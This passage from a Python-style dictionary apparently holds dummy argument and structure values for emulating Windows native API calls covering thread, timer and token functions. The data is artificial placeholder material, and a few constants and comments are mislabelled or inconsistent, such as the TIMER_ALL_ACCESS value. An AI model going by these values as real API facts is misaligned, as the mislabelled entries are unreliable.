\"NtDelayExecution\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER DelayInterval (dummy pointer, commonly negative for relative delay)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct226\",\r\n \"structureValueExpectations\": \"Negative value for relative delay in 100-nanosecond intervals.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Alertable = FALSE (wait is not alertable)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct226\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xFFFFFFFFFFDCD650\",\r\n \"fieldComment\": \"Relative delay of -2,000,000 (200ms) in 100-nanosecond units\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtImpersonateThread\": {\r\n \"ntFunc\": \"NtImpersonateThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to SECURITY_QUALITY_OF_SERVICE (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_QUALITY_OF_SERVICE\",\r\n \"structureRef\": \"struct227\",\r\n \"structureValueExpectations\": \"Impersonation level, context tracking, effective only.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ThreadToImpersonate (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000333\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct227\": {\r\n \"type\": \"SECURITY_QUALITY_OF_SERVICE\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x0000000C\",\r\n \"fieldComment\": \"Size of SECURITY_QUALITY_OF_SERVICE\"\r\n },\r\n {\r\n \"fieldName\": \"ImpersonationLevel\",\r\n \"fieldType\": \"SECURITY_IMPERSONATION_LEVEL\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SecurityImpersonation\"\r\n },\r\n {\r\n \"fieldName\": \"ContextTrackingMode\",\r\n \"fieldType\": \"BOOLEAN\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"TRUE\"\r\n },\r\n {\r\n \"fieldName\": \"EffectiveOnly\",\r\n \"fieldType\": \"BOOLEAN\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"FALSE\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenThread\": {\r\n \"ntFunc\": \"NtOpenThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to CLIENT_ID (dummy pointer)\",\r\n \"structurePointer\": \"CLIENT_ID\",\r\n \"structureRef\": \"struct228\",\r\n \"structureValueExpectations\": \"UniqueProcess and UniqueThread identifiers.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct229\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F03FF\",\r\n \"additionalComment\": \"AccessMask (THREAD_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE ThreadHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct228\": {\r\n \"type\": \"CLIENT_ID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"UniqueProcess\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x99995555\",\r\n \"fieldComment\": \"Dummy process identifier value\"\r\n },\r\n {\r\n \"fieldName\": \"UniqueThread\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x88887777\",\r\n \"fieldComment\": \"Dummy thread identifier value\"\r\n }\r\n ]\r\n },\r\n \"struct229\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no object name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryInformationThread\": {\r\n \"ntFunc\": \"NtQueryInformationThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ThreadInformationLength (16 bytes, typical for THREAD_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to THREAD_BASIC_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": \"Buffer for thread information structure.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ThreadInformationClass (ThreadBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000333\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRegisterThreadTerminatePort\": {\r\n \"ntFunc\": \"NtRegisterThreadTerminatePort\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE PortHandle (None, no port registered)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtResumeThread\": {\r\n \"ntFunc\": \"NtResumeThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG SuspendCount (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationThread\": {\r\n \"ntFunc\": \"NtSetInformationThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"ULONG ThreadInformationLength (example: 8 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"PVOID ThreadInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000002\"\r\n },\r\n {\r\n \"value\": \"0x00000009\",\r\n \"additionalComment\": \"THREADINFOCLASS ThreadInformationClass (ThreadPriority)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSuspendThread\": {\r\n \"ntFunc\": \"NtSuspendThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG PreviousSuspendCount (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTerminateThread\": {\r\n \"ntFunc\": \"NtTerminateThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xC0000005\",\r\n \"additionalComment\": \"NTSTATUS ExitStatus (STATUS_ACCESS_VIOLATION example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00004444\",\r\n \"additionalComment\": \"HANDLE ThreadHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtYieldExecution\": {\r\n \"ntFunc\": \"NtYieldExecution\",\r\n \"pushes\": [],\r\n \"structures\": {}\r\n },\r\n \"RtlCreateUserThread\": {\r\n \"ntFunc\": \"RtlCreateUserThread\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PCLIENT_ID ClientID (None, optional parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PHANDLE ThreadHandle (None, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID StartParameter (None, no parameter passed to thread start routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID StartAddress (None, invalid, but often set to a function pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG StackCommit (None, use default stack commit size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PULONG StackReserved (None, use default stack reserve size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG StackZeroBits (0, use default stack zero bits)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN CreateSuspended (FALSE, thread starts immediately)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PSECURITY_DESCRIPTOR SecurityDescriptor (None, default security)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (None, invalid, should be a valid process handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCancelTimer\": {\r\n \"ntFunc\": \"NtCancelTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PBOOLEAN CurrentState (None, optional output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"HANDLE TimerHandle (None, invalid, should be a valid timer handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateTimer\": {\r\n \"ntFunc\": \"NtCreateTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"TIMER_TYPE TimerType (NotificationTimer, default)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed timer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (TIMER_ALL_ACCESS, sample value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"PHANDLE TimerHandle (dummy pointer, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenTimer\": {\r\n \"ntFunc\": \"NtOpenTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES ObjectAttributes (None, unnamed timer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (TIMER_ALL_ACCESS, sample value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"PHANDLE TimerHandle (dummy pointer, output parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryTimer\": {\r\n \"ntFunc\": \"NtQueryTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000020\"\r\n },\r\n {\r\n \"value\": \"0x00000018\",\r\n \"additionalComment\": \"TimerInformationLength (24 bytes, typical for TIMER_BASIC_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to TIMER_BASIC_INFORMATION structure (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"TimerInformationClass (TimerBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TimerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetTimer\": {\r\n \"ntFunc\": \"NtSetTimer\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to BOOLEAN PreviousState (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00\"\r\n },\r\n {\r\n \"value\": \"0x000003E8\",\r\n \"additionalComment\": \"Period (1000 ms, 1 second)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ResumeTimer (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"TimerContext (None, no context pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"TimerApcRoutine (None, no APC routine)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER DueTime (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct230\",\r\n \"structureValueExpectations\": \"Relative or absolute time in 100-nanosecond intervals.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TimerHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct230\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xfffff5e100000000\",\r\n \"fieldComment\": \"Relative time: -1 hour in 100-nanosecond intervals\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAdjustGroupsToken\": {\r\n \"ntFunc\": \"NtAdjustGroupsToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG RequiredLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000030\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to TOKEN_GROUPS PreviousGroups (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_GROUPS\",\r\n \"structureRef\": \"struct231\",\r\n \"structureValueExpectations\": \"Previous group membership information.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000030\",\r\n \"additionalComment\": \"PreviousGroupsLength (48 bytes, enough for 2 groups)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to TOKEN_GROUPS TokenGroups (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_GROUPS\",\r\n \"structureRef\": \"struct232\",\r\n \"structureValueExpectations\": \"New group membership information.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ResetToDefault (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct231\": {\r\n \"type\": \"TOKEN_GROUPS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GroupCount\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Two groups\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[0].Sid\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0150\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[0].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"SE_GROUP_ENABLED\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[1].Sid\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0160\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[1].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000010\",\r\n \"fieldComment\": \"SE_GROUP_OWNER\"\r\n }\r\n ]\r\n },\r\n \"struct232\": {\r\n \"type\": \"TOKEN_GROUPS\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GroupCount\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One group\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[0].Sid\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0170\",\r\n \"fieldComment\": \"Pointer to SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Groups[0].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"SE_GROUP_ENABLED\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAdjustPrivilegesToken\": {\r\n \"ntFunc\": \"NtAdjustPrivilegesToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to ULONG RequiredLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000018\"\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to TOKEN_PRIVILEGES PreviousPrivileges (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_PRIVILEGES\",\r\n \"structureRef\": \"struct233\",\r\n \"structureValueExpectations\": \"Previous privilege state information.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000018\",\r\n \"additionalComment\": \"PreviousPrivilegesLength (24 bytes, enough for 1 privilege)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to TOKEN_PRIVILEGES TokenPrivileges (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_PRIVILEGES\",\r\n \"structureRef\": \"struct234\",\r\n \"structureValueExpectations\": \"Privileges to adjust.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"DisableAllPrivileges (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE TokenHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct233\": {\r\n \"type\": \"TOKEN_PRIVILEGES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One privilege\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Luid.LowPart\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000017\",\r\n \"fieldComment\": \"SE_SHUTDOWN_PRIVILEGE\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct234\": {\r\n \"type\": \"TOKEN_PRIVILEGES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One privilege\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Luid.LowPart\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000012\",\r\n \"fieldComment\": \"SE_TCB_PRIVILEGE\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part\"\r\n },\r\n {\r\n \"fieldName\": \"Privileges[0].Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateToken\": {\r\n \"ntFunc\": \"NtCreateToken\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to TOKEN_SOURCE (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_SOURCE\",\r\n \"structureRef\": \"struct235\",\r\n \"structureValueExpectations\": \"Source name and identifier.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to TOKEN_DEFAULT_DACL (dummy pointer)\",\r\n \"structurePointer\": \"TOKEN_DEFAULT_DACL\",\r\n \"structureRef\": \"struct236\",\r\n \"structureValueExpectations\": \"Default DACL for the token.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to TOKEN_PRIMARY_GROUP (dummy pointer)\",\r\n \"structurePointer\": 